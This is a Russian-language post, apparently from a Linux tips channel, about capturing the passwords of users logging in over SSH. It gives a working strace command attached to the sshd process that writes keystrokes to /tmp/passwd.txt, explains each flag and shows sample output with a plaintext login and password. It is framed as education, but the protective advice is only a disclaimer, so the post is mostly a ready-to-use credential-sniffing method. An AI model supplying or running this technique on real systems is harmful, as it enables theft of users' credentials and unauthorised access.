Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о том, как некоторые используют
strace для перехвата паролей пользователей, подключающихся по SSH. Это знание поможет тебе защитить свои системы и избежать неприятностей. Давай разберемся, как это работает и как защититься!Как работает сниффинг с помощью
strace:1. Запуск
strace для отслеживания процессов SSH:strace -f -p $(pgrep -o sshd) -o /tmp/passwd.txt -v -e trace=write -s 64
-
-f: Следим за всеми процессами sshd (мастер и дочерние).-
-p: Ищем все PID процессов sshd.-
-o: Файл, куда пишем результаты.-
-v: Пишем подробности.-
-e: Триггеримся только на запись данных.-
-s: Ограничиваем вывод данных 64 байтами (меньше мусора).2. Что происходит:
- Когда пользователь авторизуется по SSH, его пароль записывается в файл
passwd.txt в открытом виде.3. Пример вывода:
1088 write(5,"\0\0\0\5oleg", 9) = 9
1088 write(5, "\0\0\0\Barmaley1982", 17) = 17
- Логин
oleg, пароль Barmaley1982.Важно помнить:
- Эта информация предназначена исключительно для образовательных целей. Использование таких методов для незаконных действий строго запрещено.
- Защищай свои системы, следи за безопасностью и соблюдай законы своей страны.
Береги свои данные и безопасность!
📩 Завтра: Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление Съемными Носителями с Eject
🧠 - Разложение на Простые Множители с Factor
🧠 - Погружение в Команду Groups
#Linux_Mastery @LinuxSkill